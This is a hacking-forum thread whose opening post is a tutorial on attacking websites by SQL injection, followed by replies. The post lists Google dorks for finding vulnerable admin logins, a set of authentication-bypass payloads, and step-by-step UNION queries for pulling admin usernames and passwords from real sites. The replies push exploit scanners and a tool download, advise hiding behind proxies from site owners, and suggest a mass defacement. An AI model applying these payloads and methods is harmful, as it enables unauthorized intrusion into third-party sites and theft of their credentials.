(adsbygoogle = window.adsbygoogle || []).push({}); before i start i just want you guys to know that this is NOT a copy past job. ok.

===================================================
by Ryan aka. Iriish_Bhoii aka VIPhiggz09

Q what is sql injection?

A injecting sql queries into another database or using queries to get auth bypass as an admin.

part 1 : Basic sql injection

Gaining auth bypass on an admin account.
Most sites vulnerable to this are .asp
First we need 2 find a site, start by opening google.
Now we type our dork: "defenition of dork" 'a search entry for a certain type of site/exploit .ect"
There is a large number of google dork for basic sql injection.
here is the best:
"inurl:admin.asp"
"inurl:login/admin.asp"
"inurl:admin/login.asp"
"inurl:adminlogin.asp"
"inurl:adminhome.asp"
"inurl:admin_login.asp"
"inurl:administratorlogin.asp"
"inurl:login/administrator.asp"
"inurl:administrator_login.asp"

Now what to do once we get to our site.
the site should look something like this :

welcome to xxxxxxxxxx administrator panel
username :
password :

so what we do here is in the username we always type "Admin"
and for our password we type our sql injection

here is a list of sql injections

' or '1'='1
' or 'x'='x
' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

' or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

' or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --
'or'1=1'


there are many more but these are the best ones that i know of
and what this sql injection is doing : confusing the **** out of the database till it gives you auth bypass.

So your input should look like this

username:Admin
password:'or'1'='1

So click submit and you'r in
NOTE not all sites are vulnerable.


part 2: injecting sql queries to extract the admin username and password

ok so lets say we have a site :
You must login or register to view this content.
there is a list of dork 4 sites lyk this

"inurl:index.php?catid="
"inurl:news.php?catid="
"inurl:index.php?id="
"inurl:news.php?id="
or the best in my view "full credit to qabandi for discovering this"
"inurl:".php?catid=" site:xxx"


So once you have you'r site
You must login or register to view this content.
now we add a ' to the end of the url
so the site is
You must login or register to view this content.'
if there is an error of some sort then it is vulnerable
now we need to find the number of columns in the sql database
so we type
You must login or register to view this content. order by 1-- "no error"
You must login or register to view this content. order by 2-- "no error"
You must login or register to view this content. order by 3-- "no error"
You must login or register to view this content. order by 4-- "no error"
You must login or register to view this content. order by 5-- "error"

so this database has 4 columns because we got an error on 5
on some databases there is 2 columns and on some 200 it varies
so once we have the column number.
we try the union function
You must login or register to view this content. union select 1,2,3,4-- "or whatever number of columns are in the database"
if you see some numbers like 1 2 3 4 on the screen or the column names
it might not show all numbers on the screen but the numbers displayed are the ones you can replace to extract info from the db
so now we need to info about the db
so lets say the numbers 2 and 4 showed up on the screen
so i will use my query on 2
You must login or register to view this content. union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4--
the db type and version will pop up on the screen
if the db version is 4 or lower then to extract the password you will need these queries
You must login or register to view this content. UNION SELECT 1,concat(table_name,CHAR(5,column_name,CHAR(5,table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37),3,4--
this should display the table containing the admin username and password
but if not then you will have to guess the table
so once you have your table "or not"
then type
You must login or register to view this content. UNION SELECT 1,password,3,4 FROM admintablename--
where it says admintablename type the table you found with concat(table_name,CHAR(5,column_name,CHAR(5,table_schema) from information_schema.columns where column_name like CHAR(37, 112, 97, 115, 37)-- or your guess
then once u have the right table name you should get the administrator password
then just do the same thing but type username instead of password
sometimes the password is hashed and you need to crack it.
then see if you can get the admin panel if you cant then try the admin panel finder script here You must login or register to view this content.
now if the database is version 5 or up
type
You must login or register to view this content. UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
and that will display a list of all the tables
once you have your table name
type the same thing as 4
You must login or register to view this content. UNION SELECT 1,password,3,4 FROM admintable--
then the same with username
but now if it doesnt work far all those things
just tootoo around with all the little catid=1 or catid=-1 or instead of -- put /* or even nothing
just play around with those
but sometimes we also need to use the version() or version@@
so sometimes UNION SELECT version (),password,3,4 FROM admintable--
or UNION SELECT version @@,password,3,4 FROM admintable--

well that about wraps up my sql injection tutorial.
you can contact me on
[email][email protected][/email]
only msn me NO EMAILS I HATE THEM

You confused me with the two sets of dorks you found two diff sites mind helping me out there?

Edit: Ohh nevermind i think there two diff tuts in one right?

hey there. dork lists are getting quite old in the world of hacking. "exploite scanner" scans hundreds of websites in seconds to check their vulnerablilty. EVEN SQL injection is becoming easier and easier with new programs hackers are releasing which does the entire hack for you. but yeah i dont recommend dorks anymore. Exploit scanner is the way to go no a days.

Mind to hook me up with one that has no viruses?

ok.. here i just a list of the general tools you need to make SQL injection a much easier process.

Databases & SQL Injection & XSS TooLz Directory:
Casi 4.0
ForceSQL
Mssql BruteForce TooL
SQL Ping 2
SQL Recon
SQL Vuln Scanner
SQL & XSS TooL

here i the download. dont worry it i virus free

You must login or register to view this content.

there are also other tools in that dowload too but only consentrate on the sql injection part. also MAKE SURE you are running a proxy. Proxys are used to hide hacker identidys from the Real admins of websites. last time i used it, it changed my ip to somewhere in palistine. soo thats where the admin will think the culprate is from. soo be sure too use that aswell.

I use to be in this stuff big time along time ago but got out of it after one the major forums i used got closed down looking to get back into it Love shells if you can find vul sites. Maybe we can have a mass defacement in the future.

i started hacking because knowing i can have authority over something im not supposed to attracted me because im under privilaged in life. ill not bore you with my life problems. but yeah thats how i got into hacking

Half way through this I zoned out and started thinking of dog food. :/

I'm sure SQL Injection isn't legal, is it??

Also, who needs this when I can just AIM MY LOW ORBIT ION CANNONS AT IT!!! WHEN AIRSTRIKES, SOLDIERS AND TANKS FAIL, BLOW IT TO PIECES USING YOUR ION CANNONS!!!